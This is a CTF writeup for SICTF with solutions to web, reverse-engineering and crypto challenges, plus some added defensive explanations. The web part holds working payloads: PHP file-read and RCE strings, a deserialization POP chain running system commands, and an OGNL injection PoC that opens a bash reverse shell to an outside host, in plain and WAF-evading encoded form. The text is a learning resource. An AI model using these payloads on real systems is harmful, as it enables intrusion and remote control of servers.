WEB

[Sign-in] Include

A simple file inclusion: read /flag through the php://filter pseudo-protocol to get the flag.

?SICTF=php://filter/read=/resource=/flag

Baby_PHP

  1. First, a PHP quirk: special characters such as [, + and . in request parameter names are rewritten to _.

  2. Bypass preg_match: because it matches a single line, a newline (%0a) gets past it.

  3. Next is parameterless RCE; see this blog.

  4. With get_defined_vars() the command executes successfully.

    get: ?k+e[y=123%0a&b=phpinfo();

    post: command=eval(end(current(get_defined_vars())));

  5. Finally, the flag is found in the root directory.
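As an added illustration (not part of the writeup), the following Python models the two PHP behaviours that steps 1 and 2 rely on: how PHP rewrites request parameter names, and why a `$`-anchored `preg_match` accepts a value with a trailing newline. The helper names (`php_param_name`, `php_get`, `weak_check`, `strict_check`) and the approximation of PHP's name mangling (`.`, space and an unmatched `[` become `_`) are assumptions made here, checked against the writeup's own query string.

```python
import re
from urllib.parse import unquote_plus


def php_param_name(raw_name: str) -> str:
    """Approximate how PHP turns a request parameter name into a variable name.

    Constructed model of php_register_variable_ex(): after URL decoding
    ('+' is already a space), '.' and ' ' become '_'; a '[' that has a
    matching ']' starts an array index and ends the base name, while an
    unmatched '[' becomes '_' as well.  That is why k+e[y arrives as $k_e_y.
    """
    name = unquote_plus(raw_name)
    out = []
    for i, ch in enumerate(name):
        if ch == "[":
            if "]" in name[i + 1:]:
                break            # array syntax: keep only the base name
            ch = "_"             # unmatched bracket: PHP rewrites it
        elif ch in " .":
            ch = "_"
        out.append(ch)
    return "".join(out)


def php_get(query: str) -> dict:
    """Build a $_GET-like dict from a raw query string using PHP's mangling."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        raw_name, _, raw_value = pair.partition("=")
        params[php_param_name(raw_name)] = unquote_plus(raw_value)
    return params


def weak_check(value: str) -> bool:
    """preg_match('/^123$/', $v) as the challenge uses it.

    In PCRE as in Python, '$' also matches just before a final newline,
    so the value "123\\n" (the %0a from the writeup) passes.
    """
    return re.match(r"^123$", value) is not None


def strict_check(value: str) -> bool:
    """Anchor at the real end of the string: \\Z here, \\z or the D modifier in PCRE."""
    return re.match(r"^123\Z", value) is not None


if __name__ == "__main__":
    params = php_get("k+e[y=123%0a&b=phpinfo();")   # the writeup's GET query
    print(params)                                    # {'k_e_y': '123\n', 'b': 'phpinfo();'}
    print(weak_check(params["k_e_y"]))               # True: the newline slips past '$'
    print(strict_check(params["k_e_y"]))             # False
```

On the PHP side the equivalent hardening is anchoring with `\z` (or the `D` modifier) instead of `$`, or comparing with `===` when one exact value is expected; the name mangling itself cannot be switched off, so a filter that looks for a parameter spelled one way must expect every spelling PHP folds into it.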

pain

Reference blog: https://xz.aliyun.com/t/10482#toc-7

  1. Use jd-gui to view the contents of the jdk file.

  2. From pain.class it is clear that this is an OGNL expression-parsing vulnerability.

  3. Step into dinner_waf.let_me_see_see to see the WAF.

  4. Before the WAF check, the payload is URL-decoded once. Trying Unicode escapes to bypass the check turns out to work.

  5. Finally, use either of these two PoCs to get a reverse shell.

    # before encoding
    (new java.lang.ProcessBuilder(new java.lang.String[]{"bash","-c","bash -i >& /dev/tcp/7654du6216.zicp.fun/33699 0>&1"})).start()
    # after encoding
    /start?payload=(new%20java.lang.%5Cu0050%5Cu0072%5Cu006f%5Cu0063%5Cu0065%5Cu0073%5Cu0073%5Cu0042%5Cu0075%5Cu0069%5Cu006c%5Cu0064%5Cu0065%5Cu0072(new%20java.lang.String%5B%5D%7B%22bash%22%2C%22-c%22%2C%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F7654du6216.zicp.fun%2F33699%200%3E%261%22%7D)).start()
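Step 4 turns on an ordering problem: the WAF inspects the payload after one URL-decode, but OGNL resolves `\uXXXX` escapes later, so the keyword check and the parser disagree on what the string says. The Python below is an added example, not the challenge's WAF: the keyword list, the `naive_waf_blocks`/`canonical_waf_blocks` names and the sample inputs are constructed here, with the encoded class name taken from the PoC above.

```python
import re
from urllib.parse import unquote

# Constructed block-list; the real WAF's list is not shown on the page.
BLOCKED_KEYWORDS = ("ProcessBuilder", "Runtime", "getRuntime")

# Java-style \uXXXX escapes (the JLS also allows repeated u's, e.g. \uu0050).
_UNICODE_ESCAPE = re.compile(r"\\u+([0-9a-fA-F]{4})")


def decode_unicode_escapes(text: str) -> str:
    """Replace every \\uXXXX escape by the character it denotes."""
    return _UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def canonicalize(payload: str, max_rounds: int = 5) -> str:
    """URL-decode and unescape repeatedly until the text stops changing."""
    current = payload
    for _ in range(max_rounds):
        decoded = decode_unicode_escapes(unquote(current))
        if decoded == current:
            break
        current = decoded
    return current


def naive_waf_blocks(payload: str) -> bool:
    """The WAF as the writeup describes it: one URL-decode, then keyword match."""
    decoded = unquote(payload)
    return any(keyword in decoded for keyword in BLOCKED_KEYWORDS)


def canonical_waf_blocks(payload: str) -> bool:
    """Same keyword match, but on the fully canonicalized text."""
    decoded = canonicalize(payload)
    return any(keyword in decoded for keyword in BLOCKED_KEYWORDS)


# "ProcessBuilder" as \u-escapes, URL-encoded once, exactly as in the PoC above.
ENCODED_NAME = ("%5Cu0050%5Cu0072%5Cu006f%5Cu0063%5Cu0065%5Cu0073%5Cu0073"
                "%5Cu0042%5Cu0075%5Cu0069%5Cu006c%5Cu0064%5Cu0065%5Cu0072")
SAMPLE_PLAIN = "(new java.lang.ProcessBuilder(args)).start()"      # args: placeholder
SAMPLE_ENCODED = "(new java.lang." + ENCODED_NAME + "(args)).start()"

if __name__ == "__main__":
    print(unquote(SAMPLE_ENCODED))                 # what the naive WAF sees
    print(canonicalize(SAMPLE_ENCODED))            # what OGNL eventually sees
    print(naive_waf_blocks(SAMPLE_ENCODED))        # False: escapes hide the keyword
    print(canonical_waf_blocks(SAMPLE_ENCODED))    # True
```

Decoding to a fixed point narrows the gap, but any filter placed in front of an expression evaluator is guessing how the evaluator will read the input; the fix that holds is not handing attacker-controlled text to an OGNL parser at all.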

RCE

  1. Source:

    <?php
    error_reporting(0);
    highlight_file(__FILE__);
    $code = $_POST['code'];
    $code = str_replace("(","hacker",$code);
    $code = str_replace(".","hacker",$code);
    eval($code);
    ?>
  2. ( and . are filtered, but backticks are not, so backticks give RCE; just read the flag in the root directory.

  3. payload

    post: code=echo `ls /`;

我全都要 (I Want It All)

  1. Source

    <?php
    highlight_file(__FILE__);

    class B{
        public $pop;
        public $i;
        public $nogame;

        public function __destruct()
        {
            if(preg_match("/233333333/",$this->pop)){
                echo "这是一道签到题,不能让新生一直做不出来遭受打击";
            }
        }

        public function game(){
            echo "扣1送地狱火";
            if ($this->i = "1"){
                echo '<img src=\'R.jpg\'>';
                $this->nogame->love();
            }
        }

        public function __clone(){
            echo "必须执行";
            eval($_POST["cmd"]);
        }
    }


    class A{
        public $Aec;
        public $girl;
        public $boy;

        public function __toString()
        {
            echo "I also want to fall in love";
            if($this->girl != $this->boy && md5($this->girl) == md5($this->boy)){
                $this->Aec->game();
            }
        }


    }


    class P{
        public $MyLover;
        public function __call($name, $arguments)
        {
            echo "有对象我会在这打CTF???看我克隆一个对象!";
            if ($name != "game") {
                echo "打游戏去,别想着对象了";
                $this->MyLover = clone new B;
            }
        }


    }


    if ($_GET["A_B_C"]){
        $poc=$_GET["A_B_C"];
        unserialize($poc);
    }
  2. Approach:

    1. Use class B's __clone to get RCE.
    2. class P's __call can trigger 1.
    3. class B's game() can trigger 2.
    4. class A's __toString can trigger 3.
    5. class B's __destruct can trigger 4.
    6. Bypass the md5 comparison with arrays.
    7. preg_match triggers __toString.
  3. POP chain:

    <?php
    class B{
        public $pop;
        public $i="1";
        public $nogame;
    }


    class A{
        public $Aec;
        public $girl=array(1);
        public $boy=array(2);

    }


    class P{
        public $MyLover;
    }
    $a=new B();
    $a->pop=new A();
    $a->pop->Aec=new B();
    $a->pop->Aec->nogame=new P();
    echo serialize($a);
    //O:1:"B":3:{s:3:"pop";O:1:"A":3:{s:3:"Aec";O:1:"B":3:{s:3:"pop";N;s:1:"i";s:1:"1";s:6:"nogame";O:1:"P":1:{s:7:"MyLover";N;}}s:4:"girl";a:1:{i:0;i:1;}s:3:"boy";a:1:{i:0;i:2;}}s:1:"i";s:1:"1";s:6:"nogame";N;}

  4. Just read the flag in the root directory.

    get: ?A_B_C=O:1:"B":3:{s:3:"pop";O:1:"A":3:{s:3:"Aec";O:1:"B":3:{s:3:"pop";N;s:1:"i";s:1:"1";s:6:"nogame";O:1:"P":1:{s:7:"MyLover";N;}}s:4:"girl";a:1:{i:0;i:1;}s:3:"boy";a:1:{i:0;i:2;}}s:1:"i";s:1:"1";s:6:"nogame";N;}

    post: cmd=system("cat /flag");
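The whole chain starts with `unserialize($poc)` on attacker input, so a defender wants to know which classes a serialized blob would instantiate before it ever reaches unserialize(). The following parser is an added example, not part of the writeup or the challenge: it reads only the types the payload uses (N, b, i, d, s, a, O), assumes ASCII strings (PHP's s:LEN is a byte length), and the names `PhpUnserializer`, `classes_in` and `disallowed_classes` are chosen here. The sample input is the chain from step 4.

```python
from dataclasses import dataclass, field
from typing import Any, Dict, List


@dataclass
class PhpObject:
    cls: str
    props: Dict[Any, Any] = field(default_factory=dict)


class PhpUnserializer:
    """Minimal reader for PHP's serialize() format (types N, b, i, d, s, a, O).

    Constructed for inspection only: nothing is instantiated; the parser just
    records every class name the blob would ask unserialize() to create.
    """

    def __init__(self, data: str):
        self.data = data
        self.pos = 0
        self.classes: List[str] = []      # class names in order of appearance

    def parse(self):
        value = self._value()
        if self.pos != len(self.data):
            raise ValueError("trailing data after the serialized value")
        return value

    def _expect(self, token: str) -> None:
        if not self.data.startswith(token, self.pos):
            raise ValueError(f"expected {token!r} at offset {self.pos}")
        self.pos += len(token)

    def _read_until(self, delim: str) -> str:
        end = self.data.index(delim, self.pos)     # ValueError if delim is missing
        token = self.data[self.pos:end]
        self.pos = end + 1
        return token

    def _take(self, length: int) -> str:
        if self.pos + length > len(self.data):
            raise ValueError("declared length runs past the end of the data")
        chunk = self.data[self.pos:self.pos + length]
        self.pos += length
        return chunk

    def _value(self):
        if self.pos >= len(self.data):
            raise ValueError("unexpected end of data")
        tag = self.data[self.pos]
        self.pos += 1
        if tag == "N":
            self._expect(";")
            return None
        self._expect(":")
        if tag == "b":
            return self._read_until(";") == "1"
        if tag == "i":
            return int(self._read_until(";"))
        if tag == "d":
            return float(self._read_until(";"))
        if tag == "s":
            length = int(self._read_until(":"))
            self._expect('"')
            text = self._take(length)
            self._expect('";')
            return text
        if tag == "a":
            return self._members(int(self._read_until(":")))
        if tag == "O":
            name = self._take_name(int(self._read_until(":")))
            self.classes.append(name)
            return PhpObject(name, self._members(int(self._read_until(":"))))
        raise ValueError(f"unsupported type tag {tag!r} at offset {self.pos - 1}")

    def _take_name(self, length: int) -> str:
        self._expect('"')
        name = self._take(length)
        self._expect('":')
        return name

    def _members(self, count: int) -> Dict[Any, Any]:
        self._expect("{")
        members: Dict[Any, Any] = {}
        for _ in range(count):
            key = self._value()
            members[key] = self._value()
        self._expect("}")
        return members


def classes_in(payload: str) -> List[str]:
    parser = PhpUnserializer(payload)
    parser.parse()
    return parser.classes


def disallowed_classes(payload: str, allowed) -> List[str]:
    """Class names in the blob that an allow-list would reject."""
    return sorted(set(classes_in(payload)) - set(allowed))


# The POP chain from step 4 of the writeup, used here as the sample input.
SAMPLE_PAYLOAD = ('O:1:"B":3:{s:3:"pop";O:1:"A":3:{s:3:"Aec";O:1:"B":3:{s:3:"pop";N;'
                  's:1:"i";s:1:"1";s:6:"nogame";O:1:"P":1:{s:7:"MyLover";N;}}'
                  's:4:"girl";a:1:{i:0;i:1;}s:3:"boy";a:1:{i:0;i:2;}}'
                  's:1:"i";s:1:"1";s:6:"nogame";N;}')

if __name__ == "__main__":
    print(classes_in(SAMPLE_PAYLOAD))                 # ['B', 'A', 'B', 'P']
    print(disallowed_classes(SAMPLE_PAYLOAD, {"A"}))  # ['B', 'P']
```

In PHP itself the corresponding control is the `allowed_classes` option of `unserialize()` (or not accepting serialized objects from users at all); the parser only makes visible what that option would reject, including the nested second B and the P whose `__call` the chain needs.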

你能跟得上我的speed吗 (Can You Keep Up With My Speed?)

  1. The challenge demands speed, and every uploaded file turns out to be deleted right away, which points to a file-upload race condition.

  2. Use Burp for the race: one Intruder attack uploads the file without limit while a second one keeps requesting it, and eventually the flag comes out.

RE

chbase

  1. Open the file in 32-bit IDA; in the _main_0 function there is a string that looks like base64.

  2. Follow sub_4110F5 down to sub_411890, which turns out to implement base64 encoding.

  3. Find the table.

  4. Decode to get the flag.

MyObject

  1. Looking at main, there is a function named rc4, presumably RC4 encryption, and the key is SIFLAG.

  2. These variables hold values, presumably the ciphertext.

  3. Take an RC4 decryption script from the web and adapt it.

    # RC4 encryption and decryption
    def KSA(key):
        key_length = len(key)
        # initialise the S-box
        S = list(range(256))
        j = 0
        for i in range(256):
            j = (j + S[i] + key[i % key_length]) % 256
            # swap S[i] and S[j]
            S[i], S[j] = S[j], S[i]
        return S

    def PRGA(S):
        i = 0
        j = 0
        while True:
            i = (i + 1) % 256
            j = (j + S[i]) % 256
            # swap S[i] and S[j]
            S[i], S[j] = S[j], S[i]
            K = S[(S[i] + S[j]) % 256]
            yield K

    def RC4(key):
        # encryption function, returns the encrypted bytes
        def encrypt(data):
            data_length = len(data)
            keystream = PRGA(KSA(key))
            res = []
            for i in range(data_length):
                res.append(next(keystream) ^ data[i])
            return bytes(res)
        # decryption function, returns the decrypted bytes (RC4 is symmetric)
        def decrypt(data):
            return encrypt(data)
        return encrypt, decrypt

    # example:
    key = b'SIFLAG'
    encrypt_func, decrypt_func = RC4(key)
    # the ciphertext chunks taken from the binary; each chunk is reversed before concatenation
    a=[b'G\xCF"Z\x0E\xD3\'0',b'\xE5\vkG',b'\a\x85\xC3\x99\xBAS\x8D',b'\x9F\x88\xFE\x10w\x1C\x01\a']
    decrypted_data=decrypt_func(a[0][::-1]+a[1][::-1]+a[2][::-1]+a[3][::-1])

    print('Decrypted Data:', decrypted_data)

    #Decrypted Data: b'SICTF{wow_you_get_the_flag}'
  4. While decoding, the output becomes garbled from the third string onward; after removing the \xE5 from the third string, the rest decodes correctly.

不一样的base64 (A Different base64)

  1. Unpack the exe with pyinstxtractor.

  2. Decompile 111.pyc on an online site.

  3. base64-decode to get the flag.

[Sign-in] PYC

Drop it into an online pyc decompiler.

# Visit https://www.lddgo.net/string/pyc-compile-decompile for more information
# Version : Python 3.8

print('SICTF{07e278e7-9d66-4d90-88fc-8bd61e490616}')

Crypto

[Sign-in] 古典大杂烩 (Classical Cipher Hodgepodge)

  1. The file is a string of emoji; decode it with base100.

  2. Throw the result into CyberChef and try the ciphers one by one to get the flag.

Easy_CopperSmith

RSA with the high bits of p leaked.

Source:

from Crypto.Util.number import *
from flag import flag
p = getPrime(512)
q = getPrime(512)
n = p * q
e = 65537
leak = p >> 230
m = bytes_to_long(flag)
c = pow(m,e,n)
print(n)
print(leak)
print(c)
'''
114007680041157617250208809154392208683967639953423906669116998085115503737001019559692895227927818755160444076128820965038044269092587109196557720941716578025622244634385547194563001079609897387390680250570961313174656874665690193604984942452581886657386063927035039087208310041149977622001887997061312418381
6833525680083767201563383553257365403889275861180069149272377788671845720921410137177
87627846271126693177889082381507430884663777705438987267317070845965070209704910716182088690758208915234427170455157948022843849997441546596567189456637997191173043345521331111329110083529853409188141263211030032553825858341099759209550785745319223409181813931086979471131074015406202979668575990074985441810
'''
  1. First compute p on an online site (https://sagecell.sagemath.org/).

  2. Then plug p into the usual RSA decryption script to get the flag.

    from Crypto.Util.number import *
    import gmpy2
    n = 114007680041157617250208809154392208683967639953423906669116998085115503737001019559692895227927818755160444076128820965038044269092587109196557720941716578025622244634385547194563001079609897387390680250570961313174656874665690193604984942452581886657386063927035039087208310041149977622001887997061312418381

    c = 87627846271126693177889082381507430884663777705438987267317070845965070209704910716182088690758208915234427170455157948022843849997441546596567189456637997191173043345521331111329110083529853409188141263211030032553825858341099759209550785745319223409181813931086979471131074015406202979668575990074985441810
    e = 65537

    p=11790815224554410800121104187905468470390194289969616547114051282402254164513760262526048229096923579410713190006883604069013303904509383122210101811900773
    q = n//p
    phi = (p-1)*(q-1)
    d = gmpy2.invert(e,phi)
    m = pow(c,d,n)
    flag = long_to_bytes(int(m))
    print(flag)

    #b'SICTF{3f9366ed-b8e4-412f-bbd0-62616a24115c}'

small_e

Solve it with a tool in one go to get the flag.

MingTianPao

Reference link: https://blog.csdn.net/m0_63303407/article/details/127193042

  1. Use the existing script directly.

    import Crypto.Util.strxor as xo
    import libnum, codecs, numpy as np

    def isChr(x):
        if ord('a') <= x and x <= ord('z'): return True
        if ord('A') <= x and x <= ord('Z'): return True
        return False


    def infer(index, pos):
        # assume ciphertext `index` has a space at `pos`; that fixes the key byte
        # there and therefore every other plaintext byte in the same column
        if msg[index, pos] != 0:
            return
        msg[index, pos] = ord(' ')
        for x in range(len(c)):
            if x != index:
                msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(' ')

    def know(index, pos, ch):
        # known plaintext character: same propagation as infer(), but no guessing
        msg[index, pos] = ord(ch)
        for x in range(len(c)):
            if x != index:
                msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(ch)


    dat = []

    def getSpace():
        # score every (ciphertext, position) by how many XOR pairs yield a letter,
        # i.e. how likely that position holds a space
        for index, x in enumerate(c):
            res = [xo.strxor(x, y) for y in c if x!=y]
            f = lambda pos: len(list(filter(isChr, [s[pos] for s in res])))
            cnt = [f(pos) for pos in range(len(x))]
            for pos in range(len(x)):
                dat.append((f(pos), index, pos))

    c = [codecs.decode(x.strip().encode(), 'hex') for x in open('Problem.txt', 'r').readlines()]

    msg = np.zeros([len(c), len(c[0])], dtype=int)

    getSpace()

    dat = sorted(dat)[::-1]
    for w, index, pos in dat:
        infer(index, pos)

    #know(10, 21, 'y')
    #know(8, 14, 'n')

    print('\n'.join([''.join([chr(c) for c in x]) for x in msg]))
    """
    Little Red,Rdin+ Hood ppomi4e
    d to obey de mo8her. Thg gr&n
    dmother liz ou8 in the"woo#s
    , a half hcu fr#m the vklla e
    . When Litxl Re( Riding"Hoo#
    entered thi ood? a wolf"cam"
    up to her.,Se d%d not klow 0h
    nim-l he waq, a)d
    id #f him. Goo#
    day to you itt e Red Rkdin
    """
  2. It is just about recognisable as the Little Red Riding Hood story, so start repairing characters, beginning with "Little Red Riding Hood" in the first line.

    import Crypto.Util.strxor as xo
    import libnum, codecs, numpy as np

    def isChr(x):
        if ord('a') <= x and x <= ord('z'): return True
        if ord('A') <= x and x <= ord('Z'): return True
        return False


    def infer(index, pos):
        if msg[index, pos] != 0:
            return
        msg[index, pos] = ord(' ')
        for x in range(len(c)):
            if x != index:
                msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(' ')

    def know(index, pos, ch):
        msg[index, pos] = ord(ch)
        for x in range(len(c)):
            if x != index:
                msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(ch)


    dat = []

    def getSpace():
        for index, x in enumerate(c):
            res = [xo.strxor(x, y) for y in c if x!=y]
            f = lambda pos: len(list(filter(isChr, [s[pos] for s in res])))
            cnt = [f(pos) for pos in range(len(x))]
            for pos in range(len(x)):
                dat.append((f(pos), index, pos))

    c = [codecs.decode(x.strip().encode(), 'hex') for x in open('Problem.txt', 'r').readlines()]

    msg = np.zeros([len(c), len(c[0])], dtype=int)

    getSpace()

    dat = sorted(dat)[::-1]
    for w, index, pos in dat:
        infer(index, pos)

    know(0, 12, 'i')
    know(0, 16, 'g')
    know(0, 10, ' ')

    print('\n'.join([''.join([chr(c) for c in x]) for x in msg]))
    """
    Little Red Riding Hood ppomi4e
    d to obey her mother. Thg gr&n
    dmother lived out in the"woo#s
    , a half hour from the vklla e
    . When Little Red Riding"Hoo#
    entered the woods a wolf"cam"
    up to her. She did not klow 0h
    at a wicked animal he waq, a)d
    was not afraid of him. Goo#
    day to you, Little Red Rkdin
    """
  3. Then repair "Little Red Riding Hood" in line 5, which gives the complete text.

    import Crypto.Util.strxor as xo
    import libnum, codecs, numpy as np

    def isChr(x):
        if ord('a') <= x and x <= ord('z'): return True
        if ord('A') <= x and x <= ord('Z'): return True
        return False


    def infer(index, pos):
        if msg[index, pos] != 0:
            return
        msg[index, pos] = ord(' ')
        for x in range(len(c)):
            if x != index:
                msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(' ')

    def know(index, pos, ch):
        msg[index, pos] = ord(ch)
        for x in range(len(c)):
            if x != index:
                msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(ch)


    dat = []

    def getSpace():
        for index, x in enumerate(c):
            res = [xo.strxor(x, y) for y in c if x!=y]
            f = lambda pos: len(list(filter(isChr, [s[pos] for s in res])))
            cnt = [f(pos) for pos in range(len(x))]
            for pos in range(len(x)):
                dat.append((f(pos), index, pos))

    c = [codecs.decode(x.strip().encode(), 'hex') for x in open('Problem.txt', 'r').readlines()]

    msg = np.zeros([len(c), len(c[0])], dtype=int)

    getSpace()

    dat = sorted(dat)[::-1]
    for w, index, pos in dat:
        infer(index, pos)

    know(0, 12, 'i')
    know(0, 16, 'g')
    know(0, 10, ' ')
    know(4, 24, ' ')
    know(4, 28, 'd')

    print('\n'.join([''.join([chr(c) for c in x]) for x in msg]))
    """
    Little Red Riding Hood promise
    d to obey her mother. The gran
    dmother lived out in the woods
    , a half hour from the village
    . When Little Red Riding Hood
    entered the woods a wolf came
    up to her. She did not know wh
    at a wicked animal he was, and
    was not afraid of him. "Good
    day to you, Little Red Riding
    """
  4. Finally, recover the key, which is the flag.

    import Crypto.Util.strxor as xo
    import libnum, codecs, numpy as np

    def isChr(x):
        if ord('a') <= x and x <= ord('z'): return True
        if ord('A') <= x and x <= ord('Z'): return True
        return False


    def infer(index, pos):
        if msg[index, pos] != 0:
            return
        msg[index, pos] = ord(' ')
        for x in range(len(c)):
            if x != index:
                msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(' ')

    def know(index, pos, ch):
        msg[index, pos] = ord(ch)
        for x in range(len(c)):
            if x != index:
                msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(ch)


    dat = []

    def getSpace():
        for index, x in enumerate(c):
            res = [xo.strxor(x, y) for y in c if x!=y]
            f = lambda pos: len(list(filter(isChr, [s[pos] for s in res])))
            cnt = [f(pos) for pos in range(len(x))]
            for pos in range(len(x)):
                dat.append((f(pos), index, pos))

    c = [codecs.decode(x.strip().encode(), 'hex') for x in open('Problem.txt', 'r').readlines()]

    msg = np.zeros([len(c), len(c[0])], dtype=int)

    getSpace()

    dat = sorted(dat)[::-1]
    for w, index, pos in dat:
        infer(index, pos)

    know(0, 12, 'i')
    know(0, 16, 'g')
    know(0, 10, ' ')
    know(4, 24, ' ')
    know(4, 28, 'd')

    #print('\n'.join([''.join([chr(c) for c in x]) for x in msg]))
    key = xo.strxor(c[0], ''.join([chr(c) for c in msg[0]]).encode())
    print(key)

    #b'SICTF{MTP_AtTack_is_w0nderFu1}'
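The scripts above all depend on Problem.txt and on the solver eyeballing the output. To show the reasoning behind getSpace/infer/know on data that can be checked, here is an added Python example (not from the writeup): four constructed messages are XORed with one reused key, the space heuristic recovers the key wherever a column provably contains a space, and one crib fixes the rest. `recover_key_by_spaces`, `crib_drag`, `apply_crib`, `partial_decrypt`, the messages and the key are all constructed here.

```python
from typing import List, Optional

# Constructed demo data (not the challenge's Problem.txt): four equal-length
# messages, letters and spaces only, encrypted under one reused 25-byte key.
PLAINTEXTS = [
    b"attack the castle at dawn",
    b"retreat before the sunset",
    b"send more arrows to north",
    b"the scouts report nothing",
]
KEY = bytes.fromhex("9f3a7b11c4d2e85a60f7b3e94c1d28a5f0b6c7d93e7a1b5c2d")


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


CIPHERTEXTS = [xor(p, KEY) for p in PLAINTEXTS]


def is_letter(byte: int) -> bool:
    return 0x41 <= byte <= 0x5A or 0x61 <= byte <= 0x7A


def recover_key_by_spaces(cts: List[bytes]) -> List[Optional[int]]:
    """Guess key bytes at columns where one message provably holds a space.

    The key cancels in c_i ^ c_j = p_i ^ p_j.  space ^ letter is that letter
    with its case flipped and space ^ space is 0, whereas letter ^ letter is
    never a letter.  So if c_i ^ c_j is a letter or 0 for every other j, p_i
    has a space at that column and key[pos] = c_i[pos] ^ 0x20.
    """
    width = min(len(c) for c in cts)
    key: List[Optional[int]] = [None] * width
    for pos in range(width):
        for i, ci in enumerate(cts):
            votes = [ci[pos] ^ cj[pos] for j, cj in enumerate(cts) if j != i]
            if votes and all(v == 0 or is_letter(v) for v in votes):
                key[pos] = ci[pos] ^ 0x20
                break
    return key


def crib_drag(ct_a: bytes, ct_b: bytes, crib: bytes, offset: int) -> bytes:
    """If `crib` sits at `offset` in message a, this is what message b says there."""
    diff = xor(ct_a, ct_b)[offset:offset + len(crib)]
    return xor(diff, crib)


def apply_crib(key: List[Optional[int]], ct: bytes, offset: int, crib: bytes) -> None:
    """Like the script's know(): fix key bytes from a known plaintext fragment."""
    for k, byte in enumerate(crib):
        key[offset + k] = ct[offset + k] ^ byte


def partial_decrypt(ct: bytes, key: List[Optional[int]]) -> str:
    """Decrypt where the key is known and print '?' elsewhere."""
    return "".join("?" if k is None else chr(c ^ k) for c, k in zip(ct, key))


if __name__ == "__main__":
    guess = recover_key_by_spaces(CIPHERTEXTS)
    for ct in CIPHERTEXTS:
        print(partial_decrypt(ct, guess))       # e.g. ???ac? t?e ???t?e at ????
    apply_crib(guess, CIPHERTEXTS[0], 0, b"attack")   # crib: first word of message 0
    for ct in CIPHERTEXTS:
        print(partial_decrypt(ct, guess))
```

The first listing shows '?' wherever no message has a space in that column; after fixing one crib in message 0, the other three messages reveal themselves at the same positions, which is exactly what the know() calls in the writeup do. With punctuation in the plaintexts the heuristic starts to err ('.' ^ 'a' is the letter 'O', for instance), which is why the page's output needed manual repair; the defensive lesson is that a stream-cipher or one-time-pad key must never be reused.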

签到题来咯! (Here Comes the Sign-in Challenge!)

Reference link: https://blog.csdn.net/weixin_55631415/article/details/127994843

  1. e has to be brute-forced; it lies between 512 and 1024.

  2. Sage script:

    #from tqdm import trange
    import binascii
    from Crypto.Util.number import *
    import gmpy2
    def attack(c1, c2, e, n):
        # Franklin-Reiter related-message attack: both polynomials share the root x = m
        PR.<x>=PolynomialRing(Zmod(n))
        g1 = (114*x+2333)^e - c1
        g2 = (514*x+4555)^e - c2

        def gcd(g1, g2):
            while g2:
                g1, g2 = g2, g1 % g2
            return g1.monic()
        return -gcd(g1, g2)[0]


    n = 18993579800590288733556762316465854395650778003397512624355925069287661487515652428099677335464809283955351330659278915073219733930542167360381688856732762552737791137784222098296804826261681852699742456526979985201331982720936091963830799430264680941164508709453794113576607749669278887105809727027129736803614327631979056934906547015919204770702496676692691248702461766117271815398943842909579917102217310779431999448597899109808086655029624478062317317442297276087073653945439820988375066353157221370129064423613949039895822016206336117081475698987326594199181180346821431242733826487765566154350269651592993856883
    c1 = 3089900890429368903963127778258893993015616003863275300568951378177309984878857933740319974151823410060583527905656182419531008417050246901514691111335764182779077027419410717272164998075313101695833565450587029584857433998627248705518025411896438130004108810308599666206694770859843696952378804678690327442746359836105117371144846629293505396610982407985241783168161504309420302314102538231774470927864959064261347913286659384383565379900391857812482728653358741387072374314243068833590379370244368317200796927931678203916569721211768082289529948017340699194622234734381555103898784827642197721866114583358940604520
    c2 = 6062491672599671503583327431533992487890060173533816222838721749216161789662841049274959778509684968479022417053571624473283543736981267659104310293237792925201009775193492423025040929132360886500863823523629213703533794348606076463773478200331006341206053010168741302440409050344170767489936681627020501853981450212305108039373119567034948781143698613084550376070802084805644270376620484786155554275798939105737707005991882264123315436368611647275530607811665999620394422672764116158492214128572456571553281799359243174598812137554860109807481900330449364878168308833006964726761878461761560543284533578701661413931

    #m1=attack(c1,c2,2,n)
    #print(long_to_bytes(int(m1)))

    for i in range(2**9,2**10):
        if isPrime(i)==False:
            continue
        flag=attack(c1,c2,i,n)   # attack(c1, c2, e, n): i is the candidate e
        flag=long_to_bytes(int(flag))
        if b"SICTF{" in flag:
            print(flag)
            break

easy_math

The idea: bring hint1 and hint2 to a common denominator and subtract, which gives a multiple of q; the gcd of that with n then yields q, after which it is the usual RSA decryption.

from itertools import product
from math import gcd
from Crypto.Util.number import *
import gmpy2

e = 65537
n = 68123067052840097285002963401518347625939222208495512245264898037784706226045178539672509359795737570458454279990340789711761542570505016930986418403583534761200927746744298082254959321108829717070206277856970403191060311901559017372393931121345743640657503994132925993800497309703877076541759570410784984067
hint1 = 564294243979930441832363430202216879765636227726919016842676871868826273613344463155168512928428069316237289920953421495330355385445649203238665802121198919543532254290185502622234014832349396422316629991217252686524462096711723580
hint2 = 484307144682854466149980416084532076579378210225500554261260145338511061452958092407101769145891750844383042274498826787696953308289632616886162073232218214504005935332891893378072083589751354946391146889055039887781077066257013110
c = 57751903193610662622957432730720223801836323458721550133101805763463060486486266309568004721657732742899781400754207249733137375171400440423755473421971160000575072519031824740691618617905549725344323721903857290320737224300672847773455169809689188843070599176261204013341324705808617411345132933937680951713
q=0

for a,b in product(range(2**12,2**13), repeat=2):
    q=gcd(a*hint1-b*hint2,n)
    if q!=1 and q!=n:
        print(q)
        break


p = n//q
phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
flag = long_to_bytes(int(m))
print(flag)

#8358483529150257619757085065272214074629139403939506404958882156637928949429486966229697771519458532207667137987443291952917150640467328461391364839768437
#b'SICTF{452aebb6-9c16-441a-ac42-fc608bf6063f}'

Radio

Reference: "RSA tricks in CTF: low-encryption-exponent and low-decryption-exponent attacks" (KogRow's blog on CSDN)

import gmpy2
import os
from functools import reduce
